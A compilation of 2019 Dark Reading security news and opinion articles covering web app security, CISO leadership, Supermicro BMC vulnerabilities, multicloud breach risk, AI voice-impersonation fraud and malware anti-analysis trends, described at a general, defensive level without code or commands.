STE WILLIAMS

Image Source: tashatuvango

For more than two decades, Web apps were built with functionality in mind. Everything revolved around the user interface and how easy it was for users to access information and make online purchases.

No longer. The high-profile breaches of the past few years have shattered those assumptions, and companies can no longer trade off functionality for security. Today, both app security and privacy must be built into Web applications.

Setu Kulkarni, vice president of corporate strategy and business development at WhiteHat Security, says it all starts with CISOs explaining in clear terms what lackluster app security means to the company’s bottom line.

And while it’s important for CEOs to understand what’s at stake in terms of lost revenue and brand reputation, security pros are the ones who have to “own” security, Kulkarni says. “That means moving from merely responding to breaches [to mainstreaming] security into IT project teams and the entire development process,” he says.

This feature offers security pros some ideas for mainstreaming app security at their organizations. Security, after all, can’t be an afterthought. It has to become a part of the company’s culture, just as important to the product as quality control.

Steve Zurier has more than 30 years of journalism and publishing experience, most of the last 24 of which were spent covering networking and security technology. Steve is based in Columbia, Md. View Full Bio

Article source: https://www.darkreading.com/analytics/7-steps-to-web-app-security/d/d-id/1335695?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

A few weeks ago, while attending Black Hat 2019, I was invited to participate in a Dark Reading technology panel hosted by editor Tim Wilson. The discussion focused on new types of technologies that can truly improve cybersecurity defenses.

My first instincts were to go with some of the product categories I research daily. For example, I could have described how machine learning algorithms can improve security analytics or vulnerability management. I might have expounded upon how SOAR (security orchestration, automation, and response) platforms can help organizations automate manual processes and streamline security operations. Similarly, I thought about breach and attack simulation tools that can help identify risk and lead to continuous assessment and security improvement.

Yup, these technologies show great promise, but there is also a lot of hype around each. Furthermore, while enterprise organizations are using them, processes and technologies themselves remain immature. CISOs can achieve benefits with these technologies, but most that I’ve talked to are proceeding slowly and cautiously.

Given this reality, I had to take a step back and really think about technologies I consider ground breaking. It wasn’t easy, but I came up with three non-intuitive technologies that are truly making a difference to cybersecurity professionals.

Promising Technology 1: Apache Kafka. According to ESG research, 77% of enterprise organizations collect, process, and analyze more security data than they did two years ago. What kind of data? Everything: log data, network packets and flows, cyber threat intelligence, application data, cloud telemetry, and more. This makes sense for continuous security monitoring, but moving and processing real-time data streams requires a highly scalable data pipeline. Enter Apache Kafka, a community distributed event streaming platform (first developed by LinkedIn) capable of handling trillions of events a day.

Apache Kafka provides a publish/subscribe messaging bus for terabytes of security telemetry and then feeds it to numerous analytics engines in real time. Thus, Apache Kafka (and other tools, such as RabbitMQ) can help enable more rapid threat detection and response. When I first discovered Apache Kafka, it was being used in grassroots development efforts, but vendors have taken notice since then. In 2018, Splunk released a connector for Kafka to leverage the framework and other SIEM tools, and security analytics vendors are also getting involved. We can’t collect, process, analyze, and act upon security telemetry without a high-performance, highly scalable, and well-managed data pipeline. Apache Kafka is making a real difference in this area.

Promising Technology 2: The MITRE ATTCK Framework (MAF). Let’s face it, MITRE has had some swings and misses over the years, producing complex technology frameworks that never gained acceptance outside of the US federal government. (FCAPS comes to mind.) Why is MAF different? As Sun Tzu stated, “If you know the enemy and know yourself, you need not fear the result of a hundred battles.” In many cases, cybersecurity analysts knew a lot about themselves but not nearly as much about their enemy, so they tended to address each security incident individually rather than look for patterns of attack. Lockheed Martin helped change cybersecurity thinking in 2011 with its introduction of the “kill chain,” but security teams needed advanced threat intelligence and security analysis skills to map security events into Lockheed’s model.

MAF bridges this gap by acting as the “glue,” allowing analysts to contextualize and visualize individual events along kill chains and giving them detailed instructions on where to look next to uncover broader cybersecurity attacks. With its growing user popularity, it’s not surprising that MAF support is becoming ubiquitous across security analytics tools of all types. Following Sun Tzu’s wisdom, MAF forces cybersecurity analysts to think like a cybersecurity adversary. No wonder it is having such a profound impact.

Promising Technology 3: OpenC2. This OASIS standard is a bit more esoteric than Apache Kafka or MAF, and in truth it really hasn’t had an impact yet. However, in my humble opinion, it holds great potential. OpenC2 creates an abstraction layer for standardizing communications and instructions for security controls. For example, suppose an organization receives high-fidelity threat intelligence that a specific IP address is malicious. The immediate response would be to block this IP address across all security controls. With existing security technologies, this could mean translating this rule into vendor-specific syntax, which can get cumbersome in a large heterogeneous enterprise. This is why SIEM, SOAR, and TIP vendors (among others) spend so much time and effort developing connectors and building partner ecosystems.

OpenC2 could alleviate this translation problem through common standards. Rather than individual connectors, security controls such as endpoint security software, firewalls, proxies, DNS services, etc., would talk OpenC2, so analytics engines could issue a single rule for all relevant security controls. I believe this standardization could really help automate, accelerate, and scale data-driven security processes.

There’s a common pattern with all three technologies: Each one acts as a force multiplier, adding value to every other security technology around it. This alone could make them extremely beneficial for CISOs and enterprise organizations.

Related Content:

• 2019 Pwnie Award Winners (And Those Who Wish They Weren’t)
• Black Hat 2019: Security Culture Is Everyone’s Culture
• How Behavioral Data Shaped a Security Training Makeover

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s top story: “‘It Saved Our Community’: 16 Realistic Ransomware Defenses for Cities.”

Jon Oltsik is an ESG senior principal analyst, an ESG fellow, and the founder of the firm’s cybersecurity service. With over 30 years of technology industry experience, Jon is widely recognized as an expert in all aspects of cybersecurity and is often called upon to help … View Full Bio

Article source: https://www.darkreading.com/risk/3-promising-technologies-making-an-impact-on-cybersecurity/a/d-id/1335684?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Todd Fitzgerald is a builder. An information security leader for more than 20 years (and an IT pro for even longer) he has encountered a common theme in his career: He’s the guy who is asked to create programs from scratch.

He started the software life cycle development program in one organization. The data-modeling initiative in another. As he moved from industry to industry, and from one Fortune 500 company to another, he helped launch many organizations’ initial security efforts. 

“I’m used to being the CISO walking in the door for the first time and getting things off the ground,” says Fitzgerald, now managing director of CISO Spotlight. His latest book, “CISO COMPASS: Navigating Cybersecurity Leadership Challenges with Insights from Pioneers,” was published late last year. He is also co-author of “(ISC)² CISO Leadership: Essential Principles for Success, “Information Security Governance Simplified: From the Boardroom to the Keyboard,” and co-author for the E-C Council’s “CISO Body of Knowledge.”

What has Fitzgerald learned in more than two decades? Go slowly. There are vital steps to take before a security manager should even think about change.

As more organizations invest in security, the role of the chief information security officer is growing and evolving. But those CISOs who fill roles often don’t stay long. A recent survey of CISOs from Nominet found the majority of CISOs said average job length was less than three years (55%), with nearly one-third (30%) saying less than two years.

In a role that often offers only a short time to make an impact, where should these security managers start when they first arrive in an organization?

A New CISO’s First Priority: Listening
Practice patience. “It takes restraint to not suggest solutions in those first few weeks,” Fitzgerald says. “But I think one of the most important things to do first is understand the culture of the organization.”

A period of listening and observing is paramount to comprehend why things are being done the way they are, he says. Preconceived notions will only hinder your efforts to understand what makes employees tick, he says.

“There may be a whole lot of reasons why the environment is the way it is,” Fitzgerald says. “If you go in there and start to make observations that are critical, you don’t know who it is you might offend. You really do have to listen to how things got the way they are.”

It is also a time to understand where the security department has been and what changes might be expected going forward.

“Was there a recent data breach? Why are you there? Why is your predecessor gone?” he advises asking.

Meet Your Team
Plan to have one-on-one meetings with your direct reports to understand their strengths, weaknesses, and insights on security strategy. Tap their institutional knowledge and build trust so they know they can come to you with concerns and feedback.

It’s also a time to get to know the multigenerational workforce dynamics on the team. Fitzgerald devotes an entire chapter of his latest book to the topic.

In a blog post from Ken Xie, CEO of Fortinet, he notes there are now three generations of security workers. The first generation founded initial security efforts and departments and were focused on securing network connections with legacy tools and strategies. The second generation of security continued to protect traditional networks in new ways. Now a third generation is emerging to protect digital organizations. 

Each of these security team members will bring different perspectives about the mission and goals of your security efforts. It is important to understand each of them by taking the time to have listening sessions.

“When I have done these sessions with people, we wind up with a greater understanding of one another,” Fitzgerald says. “I think it is really important to get to know each other before you can get things done.”

Build Bonds Outside Security
Beyond the core security team, those first few months are also a time to build connections with key stakeholders outside of security. Sit down with leaders and decision makers in finance, human resources, marketing, and other lines of business.

Fitzgerald advises putting together a short but informative presentation that can be used to engage senior leaders around the business.

“I would go around to all senior executives, managers, and staff and put together 20-minute PowerPoint presentation on what I do and what I think my role is,” he says. “Then listen to their concerns about what they have seen work, what they have not. It’s a great time to not push your agenda, but to really build relationships.”

Focus on Driving the Business 
With those executive and management meetings under your belt, it’s time to shift focus to how the security department will not only defend critical data and assets, but add value and further the business mission.

Return on investment matters for security today, and CISOs are increasingly asked to demonstrate that whenever they make the case for budget. While it may not be possible to measure direct ROI for every aspect of cybersecurity, the end goal is to optimize investments through a combination of people, processes, and technology. CISOs should plan to create a road map for their next few months with these objectives in mind, Fitzgerald says.

“This starts by recognizing management is motivated by their own goals,” he explains. “There has to be an honest attempt to try and understand what the major initiatives are for them. What do they want to do this year? How can security make that easier for them?”

Finally, Make an Action Plan 
Within 60 days, new CISOs should establish a draft action plan. Look at it merely as a draft of your vision, open to revision.

Then, according to Fitzgerald, share that strategy and invite feedback from other stakeholders in the organization. And be ready to make changes. Your security strategy will always be a work in progress. 

“People want to know what are you going to do for them,” Fitzgerald says. “And you need to start there when you’re explaining your plans to them.”

Related Content:

• Haas Formula 1 CIO Builds Security at 230 MPH
• ‘Culture Eats Policy for Breakfast’: Rethinking Cybersecurity Awareness
• 5 Ways to Improve the Patching Process
• The State of IT Operations and Cybersecurity Operations

Joan Goodchild is a veteran journalist, editor, and writer who has been covering security for more than a decade. She has written for several publications and previously served as editor-in-chief for CSO Online. View Full Bio

Article source: https://www.darkreading.com/edge/theedge/it-takes-restraint-a-seasoned-cisos-sage-advice-for-new-cisos-/b/d-id/1335716?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

At least 47,000 Supermicro servers are vulnerable to attack and compromise over the Internet via several security vulnerabilities in a remote monitoring and management component on the systems.

Supermicro has urged organizations using its X9, X10, and X11 platforms to block the port through which attacks can be carried out while the company works on getting a security fix issued.

The vendor has also asked impacted organizations to ensure that the vulnerable component is operating on an isolated private network and is not directly exposed to the Internet. The precaution “would reduce but not eliminate the identified exposure,” Supermicro said in an advisory Tuesday.

The vulnerabilities – discovered by security vendor Eclypsium – exist in the baseboard management controllers (BMC) of Supermicro servers. They give attackers a way to remotely connect to a server, mount a virtual USB CD/DVD drive, and carry out a variety of activities including loading a new operating system image, modifying settings, dropping malware, or disabling the device entirely.

A BMC is an embedded component that allows administrators to do out-of-band monitoring of servers and desktops. BMCs have direct access to the motherboard of the host system and enable actions like remote rebooting, remote OS reinstallation, and remote log analysis. Most desktops and servers ship with BMCs on them.

“BMCs are highly privileged devices in modern systems that [also] have a poor security track record,” says Rick Altherr, principal engineer at Eclypsium. Security researchers are actively looking for ways to attack BMCs because of their reputation for being riddled with vulnerabilities, he says. Over the years security researchers have discovered weaknesses in BMCs from HP, Dell, IBM, Supermicro, Oracle, Fujistu, and others.

“End users should treat them [BMCs] as vulnerable and take steps to protect them on their network,” Altherr says. “For the future, server vendors need to hear from customers that BMC security is important and needs to be addressed.”

According to Eclypsium, the problem it found has to with how the BMCs on Supermicro’s X9, X10, and X11 servers have implemented a virtual media function designed to give users and administrators a way to remotely connect via TCP port 623 to a disk image as a virtual USB CD or DVD drive on a system.

Authentication Weaknesses

What Eclypsium’s researchers discovered is that the virtual media service on the Supermicro BMCs allows plain-text authentication and sends traffic unencrypted, or only weakly encrypted, between the client and server.

The BMCs on Supermicro’s X10 and X11 platforms also allow for authentication bypass entirely. Eclypsium’s researchers found that when a client is properly authenticated to the virtual media service on these devices and disconnects, crucial details about that client’s session are left intact. When a new client connects, it inherits the previous client’s authorizations even if the new client attempts access using incorrect authentication credentials.

Together, the weaknesses give attackers a way to relatively easily gain access to a server and plug a virtual USB into it and carry out different types of malicious activity, Eclypsium said this week. Because of how Supermicro has implemented the virtual media service, an attacker can virtually mount any USB device to the server.

Attackers can gain access using a legitimate user’s authentication packet by exploiting default credentials or in some cases, by bypassing authentication entirely, the security vendor said.

An Eclypsium scan of TCP port 623 showed there are more than 47,330 BMCs with the vulnerable virtual-media services that are publicly accessible. Many other vulnerable systems likely exist that are not directly accessible from the Internet, but can be exploited by attackers with access to a corporate network, Eclypsium said.

A majority of the vulnerable systems belong to US-based organizations, says Altherr.

In all, the security vendor discovered over 92,000 BMCs that are discoverable over the Internet, including the over 47,300 servers with the vulnerable virtual-services component.

Related Content:

• Firmware Vulnerabilities Show Supply Chain Risks
• BlueKeep Exploits Appear as Security Firms Continue to Worry About Cyberattack
• How to Keep Your Web Servers Secure
• 7 Truths About BEC Scams

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s top story: “‘It Saved Our Community’: 16 Realistic Ransomware Defenses for Cities.”

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year … View Full Bio

Article source: https://www.darkreading.com/vulnerabilities---threats/over-47k-supermicro-corporate-servers-vulnerable-to-attack/d/d-id/1335717?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

More than half of firms running multicloud environments have been hit with a data breach in the past year, compared with 24% of hybrid cloud organizations and 24% of single-cloud users.

To gain a better understanding of how the public and private sectors are engaging with the $325 billion cloud market, researchers with Nominet polled 274 CISOs, CTOs, CIOs, and other professionals responsible for cybersecurity in large organizations across the US and UK. While 61% believe the risk of a breach is the same or lower in the cloud compared with on-prem environments, it seems there is a link between the number of clouds used and risk of attack.

The majority (71%) of respondents use software-as-a-service (SaaS) and 60% use infrastructure-as-a-service (IaaS). Fewer have moved to platform-as-a-service (PaaS) or business-process-as-a-service (BPaaS). Nearly half (48%) report their organizations uses a multicloud approach, and 24% use hybrid cloud. Only 29% of respondents use cloud services from one provider. Google Cloud was the most popular (56%), followed by IBM (49%), Oracle (44%), Microsoft Azure (36%), and AWS (32%).

Businesses using a multicloud approach are both more likely to have experienced a breach and more likely to have suffered multiple breaches: Sixty-nine percent of multicloud businesses report 11 to 30 breaches, compared with 19% of single-cloud organizations and 13% of hybrid cloud users.

Nominet vice president Stuart Reed points to a “tipping point” in terms of cloud adoption as more businesses consider the potential risks involved. Still, 69% remain moderately, very, or extremely worried about cloud security. Most fear cybercriminal sophistication and customer data exposure; other trepidations relate to increased attack surface, Internet of Things devices, and visibility.

These concerns no longer block cloud adoption as organizations recognize the cloud’s potential to drive growth. “I think a lot of major SaaS applications are finding their way into enterprises as a matter of course now,” he says. “We’re beyond the point of people ‘dipping their toe’ in.” Organizations are beyond using one cloud; now, more of them use at least two – if not more.

“There is a huge amount of choice out there in the market, from a cloud perspective,” Reed says. “Organizations, generally speaking, have varied requirements depending on the project [they’re] doing.” A cloud service that works for one project may not work for another, for example, or have different geographical requirements. Companies’ solution is to use several.

The higher likelihood of a breach for multicloud businesses has less to do with the security of each provider and more to do with heightened complexity. Each new cloud service increases the number of touch points onto a network, expanding opportunities for an attacker to get in.

“The traditional view of the network is becoming increasingly dissolved,” he continues. “The network becomes broader, wider, and more significant. The need to be able to have a good level of visibility across that is highly important.”

Navigating the Complexity of Cloud
For businesses working to secure existing multicloud environments, or those considering an additional cloud provider, Reed advises taking inventory of where assets reside and understanding the full breadth of the clouds. Knowing the implications of where data passes through and how it reaches other parts of the network or the Internet is important to achieve the level of visibility and understand what normal behavior looks like in the organization.

Nearly two-thirds of respondents (63%) already outsource cloud security to managed service providers, Nominet found. For organizations considering outsourcing, Reed emphasizes the importance of asking the right questions. Understand what they are able to offer and the security processes and procedures in place. This creates clarity between the supplier and organization in terms of what should happen when a breach is identified and how to mitigate it.

“It’s the same level of diligence they need to apply to any supplier,” he says.

Most (57%) respondents expect their cloud security budgets to increase, researchers found; the only industries where it’s expected to lower are pharmaceuticals and hospitality. Budget increases could signify a more security-conscious organization, they report, or a response to an incident. Respondents are likely to believe cloud security budgets are increasing if their organization had been hit with a cyberattack in the 12 months prior.

Related Content:

• 7 Biggest Cloud Security Blind Spots
• 3 Promising Technologies Making an Impact on Cybersecurity
• Google Uncovers Massive iPhone Attack Campaign
• Overburdened SOC Analysts Shift Priorities

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s top story: ‘It Saved Our Community’: 16 Realistic Ransomware Defenses for Cities.

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial … View Full Bio

Article source: https://www.darkreading.com/cloud/multicloud-businesses-face-higher-breach-risk/d/d-id/1335719?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Fraudsters are constantly looking for new ways to scam their victims. One unique case gives the security industry a glimpse of what they could do with artificial intelligence (AI) and voice recording.

As part of an incident in March, an attacker called the CEO of a UK-based energy business pretending to be the head of its German parent company. Analysts believe AI-based software was used to impersonate the chief executive’s voice, as it had the slight German accent and other qualities the UK CEO recognized in his boss’s voice — qualities that led him to believe the call was legitimate. The caller issued an “urgent” request to the CEO, demanding he transfer $243,000 to a Hungarian supplier within an hour’s time.

The transfer went through and the money was later moved to other countries. Scammers continued to contact the UK company and make additional payment requests, according to Euler Hermes, the organization’s insurer. However, the CEO grew suspicious and did not transfer the funds.

While this incident is still under investigation, the Wall Street Journal cites officials saying this impersonation attack is the first in which fraudsters “clearly” leveraged AI to mimic someone’s voice. It’s believed this technology could make it easier for scammers to manipulate enterprise victims, complicating matters for defenders who don’t yet have the technology to detect them.

Read more details here.

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s top story: “‘It Saved Our Community’: 16 Realistic Ransomware Defenses for Cities.”

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/risk/cybercriminals-impersonate-chief-execs-voice-with-ai-software/d/d-id/1335722?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

As cybercriminals continue to hone their attack approaches, they are also tuning their post-intrusion models. Many modern malware tools already incorporate features for evading antivirus and other threat detection measures, but research shows that attackers are also becoming more sophisticated in their obfuscation and anti-analysis practices to avoid detection if an infiltration attempt is successful.

Based on analysis of data from Fortinet’s “Q2 2019 Threat Landscape Report,” this article examines a recent spam campaign that used novel anti-analysis and evasion techniques.

Anatomy of a Spam Attack
Many modern malware tools include features for evading antivirus and other threat-detection measures. Examples include routines that enable the malware to detect when it is running within a sandbox environment, functions for disabling security tools on an infected system, and the use of junk data to make disassembly harder. 

A good example of how adversaries are tweaking these anti-analysis techniques can be found in a macro that was used in a major spam campaign in Japan last quarter. This campaign involved a phishing email with a weaponized Excel document attached that contained a malicious macro. Our analysis showed the macro had attributes for disabling security tools, executing commands arbitrarily, and causing memory problems — and also ensuring that it would run only on Japanese systems. 

The macro used in the Japanese spam campaign, like much other malicious software, was designed to look for certain Excel-specific variables at multiple points during execution to ensure it was running within an Office Excel environment and not in an emulator. One Excel property that it looked for in particular — the xlDate variable — was something that we haven’t observed before in other malware. Interestingly, the variable appears to be undocumented in Microsoft’s documentation —at least, we were unable to find it.

The use of such anti-analysis techniques, though nothing new, appears to be growing. In June, for example, security researchers found a new variant of the Dridex banking Trojan that evaded several traditional antivirus tools by using 64-bit DLLs with file names of legitimate Windows executables. The file names and associated hashes changed each time the victim logged in, making it hard for signature-based antivirus tools to spot the malware on infected host systems. This Dridex variant also took advantage of a known weakness in the Windows Management Instrumentation Command-line (WMIC) utility to bypass application whitelisting measures and execute malicious VBS code embedded within an XSL file.

Multiple reports of downloaders with sophisticated, built-in defense-evasion techniques also appeared in the second quarter. One example is AndroMut, a downloader that the Russian-speaking TA505 group used in a campaign targeting individuals working at financial companies. AndroMut’s anti-analysis features include sandboxing and emulator verification and checks for mouse movement and debuggers. At least two other downloaders — Brushaloader and a new version of JasperLoader — were reported in the second quarter as having similarly advanced evasion mechanisms.

Best Practices
Here are five best practices you can implement to build or expand on a multilayered defense strategy.

1. Add this anti-analysis trend into your current risk analysis strategy. Your IT team needs to know about this risk and consider options, such as storing system backups off-site, putting redundant systems in place, and being able to lock down segments of the network when an attack is detected.
2. Inventory all critical assets and services across your network. Expand your efforts to identify and patch vulnerable systems, replace older systems that are no longer supported, or enhance compensating security tools. This will likely involve implementing some sort of asset-tracking and management solution.
3. Segment your networks. Segmentation can be used for a variety of security purposes. For example, you can keep Internet of Things (IoT) and similar devices automatically separated from your production network until they can be properly secured. This should also be tied to device authentication and network access control at access points. This enables you to identify and authenticate devices, manage access, inspect traffic, and then assign it to secure network segments — all at wire speed. You also need to set up checkpoints to monitor traffic that passes between network segments looking for anomalous behaviors, malware, and other sophisticated attacks.
4. Inspect encrypted traffic. It takes 50 to 100 times more processing power than conventional traffic to perform deep inspection of encrypted traffic and unstructured data, such as the raw data produced by many IoT devices. Unfortunately, most security devices and may need to be upgraded to do this.
5. Automate event correlation. In today’s high-performance environments, you can’t afford to hand-correlate threat data to detect threats or respond at anything less than machine speeds. To address this issue, you must be able to automatically collect and correlate real-time threat intelligence to identify and stop an attack before it can deliver its payload or extract the data it’s looking for.

Future-Forward Security
Malicious actors aren’t only creating new ways to access your network but are also developing new ways to remain undetected once in and do as they please for as long as they like. By understanding the risks and putting the right defenses in place, your organization can defend itself against not only these latest attack trends but also those that have yet to be devised.

Toward that end, FortiGuard creates adversary playbooks based on its role in the Cyber Threat Alliance. These playbooks describe the tools, techniques, and steps that adversaries use to achieve their goal. The goal is to enable IT security teams to disrupt malicious actors more systematically. The most recent playbook dissects Zegost, an info-stealer used recently against a Chinese government agency, and is available here.

Related Content:

• The State of IT Operations and Cybersecurity Operations
• 9 Things That Don’t Worry You Today (But Should)
• Unsecured IoT: 8 Ways Hackers Exploit Firmware Vulnerabilities
• Cryptography the Hype Over Quantum Computing

Check out The Edge, Dark Reading’s new section for features, threat data, and in-depth perspectives. Today’s top story: “‘It Saved Our Community’: 16 Realistic Ransomware Defenses for Cities.”

Derek Manky formulates security strategy with more than 15 years of cyber security experience behind him. His ultimate goal to make a positive impact in the global war on cybercrime. Manky provides thought leadership to industry, and has presented research and strategy … View Full Bio

Article source: https://www.darkreading.com/risk/upping-the-ante-on-anti-analysis/a/d-id/1335648?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple